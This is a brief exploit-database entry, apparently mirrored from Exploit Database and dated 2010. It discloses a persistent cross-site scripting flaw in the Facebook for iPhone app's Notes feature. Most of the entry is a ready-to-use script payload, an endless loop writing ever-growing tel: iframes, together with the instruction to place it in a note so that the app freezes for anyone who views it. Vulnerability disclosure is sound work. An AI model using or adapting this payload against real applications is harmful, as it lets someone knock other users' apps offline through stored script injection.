Facebook for iPhone – Persistent Cross-Site Scripting Denial of Service

• Exploit Database
• 15 阅读

• 作者： marco_
  日期： 2010-01-03
• 类别：

  • dos
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/10947/

• Facebook for iPhone persistent XSS
  
  Facebook application for iPhone is not encoding special characters in Notes detail
  
  Adding this code in a note will freeze application:
  <script>var x = 'x'; while (1) { document.write('<iframe src="tel:'+x+'"></iframe>'); x = x + 'x'; }</script>
  
  App page: http://www.facebook.com/apps/application.php?id=6628568379
  Download: http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewSoftware?id=284882215&mt=8
  
  marco_ <marcojetson@gmail.com>